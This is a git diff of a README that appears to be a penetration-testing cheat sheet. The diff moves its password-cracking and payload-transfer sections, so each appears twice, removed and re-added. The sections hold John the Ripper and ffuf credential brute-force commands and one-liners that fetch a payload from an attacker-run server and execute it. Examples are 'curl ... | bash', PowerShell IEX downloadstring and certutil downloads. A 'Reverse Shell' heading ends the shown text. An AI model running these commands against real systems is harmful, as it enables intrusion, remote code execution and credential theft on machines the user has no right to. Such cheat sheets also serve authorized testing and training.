Update README.md
288
README.md
288
README.md
@@ -567,6 +567,15 @@ upload {FILE.exe}
|
||||
```
|
||||
|
||||
|
||||
<br />
|
||||
|
||||
# Active Directory
|
||||
|
||||
***
|
||||
<br />
|
||||
|
||||
https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png
|
||||
|
||||
<br />
|
||||
|
||||
# Buffer Overflow
|
||||
@@ -633,148 +642,11 @@ python3 exploit.py
|
||||
|
||||
<br />
|
||||
|
||||
# Password Cracking
|
||||
|
||||
***
|
||||
|
||||
## John The Ripper
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# About: A tool used to crack passwords, hashes, and zip files
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
|
||||
sudo zip2john {FILE.zip} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
|
||||
sudo rar2john {FILE.rar} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a password file {FILE.txt}
|
||||
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
|
||||
|
||||
# --format={HASH}: Specifiy a hash type to crack (see below)
|
||||
john --format=Raw-MD5 {FILE.txt}
|
||||
|
||||
:'
|
||||
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
|
||||
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
|
||||
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
|
||||
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
|
||||
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
|
||||
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
|
||||
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
|
||||
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
|
||||
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
|
||||
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
|
||||
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
|
||||
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
|
||||
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
|
||||
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
|
||||
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
|
||||
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
|
||||
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
|
||||
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
|
||||
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
|
||||
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
|
||||
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
|
||||
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
|
||||
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
|
||||
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
|
||||
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
|
||||
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
|
||||
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
|
||||
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
|
||||
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
|
||||
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
|
||||
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
|
||||
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
|
||||
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
|
||||
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
|
||||
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
|
||||
dummy, crypt
|
||||
'
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
## FFUF
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# FFUF
|
||||
# About: A tool used to brute force web credentials
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - One variable FUZZ
|
||||
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
|
||||
|
||||
|
||||
# EXAMPLE {FILE}
|
||||
username=admin$password=FUZZ
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
# Payload File Transfer
|
||||
|
||||
***
|
||||
|
||||
#### [STEP 1] Python Server on Client
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Python Server
|
||||
# About: A python command used to open a server on the client machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# USAGE - Host on client machine
|
||||
sudo python3 -m http.server {PORT}
|
||||
|
||||
# {PORT}: Port to open for file transfer
|
||||
```
|
||||
<br />
|
||||
|
||||
#### [STEP 2] Download Command on Server
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# WGET
|
||||
# About: A command used to download files on the current machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Download on server machine
|
||||
wget {IP ADDRESS}/{FILE} -outfile {FILE}
|
||||
curl {IP ADDRESS}/{FILE}
|
||||
|
||||
# Linux - Download file and execute in bash:
|
||||
curl {IP ADDRESS}/{FILE.sh} | bash
|
||||
|
||||
# Windows - Download file and execute in powershell:
|
||||
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
||||
powershell -c 'Invoke-AllChecks'
|
||||
|
||||
# Windows - Download file using certutil
|
||||
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
||||
|
||||
# Windows - Download file using powershell
|
||||
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
||||
|
||||
# {IP ADDRESS}: IP Address of the client from step one (python server)
|
||||
# {FILE}: The payload to be transferred
|
||||
```
|
||||
<br />
|
||||
|
||||
# Privilege Escalation
|
||||
|
||||
<br />
|
||||
|
||||
## Windows - Winpeas
|
||||
## Windows
|
||||
|
||||
<br />
|
||||
|
||||
@@ -816,7 +688,7 @@ Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | selec
|
||||
```
|
||||
<br />
|
||||
|
||||
## Linux - Linpeas
|
||||
## Linux
|
||||
|
||||
<br />
|
||||
|
||||
@@ -881,6 +753,144 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
|
||||
```
|
||||
<br />
|
||||
|
||||
|
||||
# Password Cracking
|
||||
|
||||
***
|
||||
|
||||
#### John The Ripper
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# About: A tool used to crack passwords, hashes, and zip files
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
|
||||
sudo zip2john {FILE.zip} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
|
||||
sudo rar2john {FILE.rar} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a password file {FILE.txt}
|
||||
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
|
||||
|
||||
# --format={HASH}: Specifiy a hash type to crack (see below)
|
||||
john --format=Raw-MD5 {FILE.txt}
|
||||
|
||||
:'
|
||||
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
|
||||
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
|
||||
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
|
||||
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
|
||||
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
|
||||
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
|
||||
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
|
||||
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
|
||||
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
|
||||
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
|
||||
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
|
||||
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
|
||||
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
|
||||
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
|
||||
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
|
||||
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
|
||||
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
|
||||
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
|
||||
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
|
||||
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
|
||||
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
|
||||
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
|
||||
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
|
||||
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
|
||||
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
|
||||
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
|
||||
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
|
||||
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
|
||||
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
|
||||
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
|
||||
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
|
||||
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
|
||||
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
|
||||
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
|
||||
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
|
||||
dummy, crypt
|
||||
'
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
### FFUF
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# FFUF
|
||||
# About: A tool used to brute force web credentials
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - One variable FUZZ
|
||||
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
|
||||
|
||||
|
||||
# EXAMPLE {FILE}
|
||||
username=admin$password=FUZZ
|
||||
|
||||
```
|
||||
<br />
|
||||
|
||||
# Payload File Transfer
|
||||
|
||||
***
|
||||
|
||||
#### [STEP 1] Python Server on Client
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Python Server
|
||||
# About: A python command used to open a server on the client machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# USAGE - Host on client machine
|
||||
sudo python3 -m http.server {PORT}
|
||||
|
||||
# {PORT}: Port to open for file transfer
|
||||
```
|
||||
<br />
|
||||
|
||||
#### [STEP 2] Download Command on Server
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# WGET
|
||||
# About: A command used to download files on the current machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Download on server machine
|
||||
wget {IP ADDRESS}/{FILE} -outfile {FILE}
|
||||
curl {IP ADDRESS}/{FILE}
|
||||
|
||||
# Linux - Download file and execute in bash:
|
||||
curl {IP ADDRESS}/{FILE.sh} | bash
|
||||
|
||||
# Windows - Download file and execute in powershell:
|
||||
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
||||
powershell -c 'Invoke-AllChecks'
|
||||
|
||||
# Windows - Download file using certutil
|
||||
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
||||
|
||||
# Windows - Download file using powershell
|
||||
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
||||
|
||||
# {IP ADDRESS}: IP Address of the client from step one (python server)
|
||||
# {FILE}: The payload to be transferred
|
||||
```
|
||||
<br />
|
||||
|
||||
|
||||
# Reverse Shell
|
||||
|
||||
<br />
|
||||
|
||||